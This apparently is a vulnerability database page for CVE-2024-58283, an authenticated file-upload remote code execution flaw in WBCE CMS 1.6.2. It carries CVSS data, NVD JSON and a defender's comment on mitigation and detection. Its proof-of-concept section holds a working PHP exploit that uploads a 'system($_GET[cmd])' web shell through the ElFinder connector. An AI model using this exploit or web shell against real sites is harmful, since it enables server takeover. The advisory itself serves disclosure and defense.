Security Vulnerability Report
CVE-2024-58283 CVSS 8.8 HIGH

CVE-2024-58283

Published: 2025-12-10 22:16:20
Last Modified: 2025-12-16 15:09:05

Description

WBCE CMS version 1.6.2 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files through the Elfinder file manager. Attackers can exploit the file upload functionality in the elfinder connector to upload a web shell and execute arbitrary system commands through a user-controlled parameter.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wbce:wbce_cms:1.6.2:*:*:*:*:*:*:* - VULNERABLE
WBCE CMS 1.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php /* Review note (defender's view). What this PoC demonstrates is an unrestricted file upload (CWE-434, per the NVD weakness entry) reachable by any authenticated low-privilege user (CVSS PR:L) through the ElFinder connector endpoint admin/elfinder/connector.minimal.php in WBCE CMS 1.6.2: a .php file is accepted by the upload command and written into a web-served, writable directory (media/), after which the web server executes it. Mitigation: restrict the connector to the roles that genuinely need file management, enforce a server-side allow-list of non-executable file types on upload, and configure the media/upload directory so the web server never executes scripts from it. Detection: alert on new *.php files appearing under the media directory, on POST requests to connector.minimal.php whose multipart body carries a PHP content type, and on requests to freshly created files in that directory. The script is shown collapsed onto one line by the page; it is kept as-is here, not repaired. */ // CVE-2024-58283 PoC - WBCE CMS ElFinder RCE // Authentication required with low privilege access $target = 'http://target-site.com/admin/elfinder/connector.minimal.php'; $upload_path = '/var/www/html/media/'; // or any writable directory // Create malicious PHP webshell $webshell = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>'; // Prepare multipart form data for file upload $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(8)); $body = "--{$boundary}\r "; $body .= 'Content-Disposition: form-data; name="upload[]"; filename="shell.php"\r '; $body .= "Content-Type: application/x-php\r\n\r\n"; $body .= $webshell . "\r\n"; $body .= "--{$boundary}--\r\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target . '?cmd=upload&target=l1_Lw'); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $body); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Content-Type: multipart/form-data; boundary=' . $boundary, 'Cookie: WBCE_SESSION=your_authenticated_session' ]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); echo "Upload Response: $response\n"; echo "Shell uploaded at: http://target-site.com/media/shell.php?cmd=id\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-58283", "sourceIdentifier": "[email protected]", "published": "2025-12-10T22:16:20.267", "lastModified": "2025-12-16T15:09:04.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WBCE CMS version 1.6.2 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files through the Elfinder file manager. Attackers can exploit the file upload functionality in the elfinder connector to upload a web shell and execute arbitrary system commands through a user-controlled parameter."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wbce:wbce_cms:1.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "FFE9AA75-B493-4593-9A24-CDEAE2A6A2CB"}]}]}], "references": [{"url": "https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wbce-cms.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/52039", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/wbce-cms-remote-code-execution-via-elfinder-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Product"]}]}}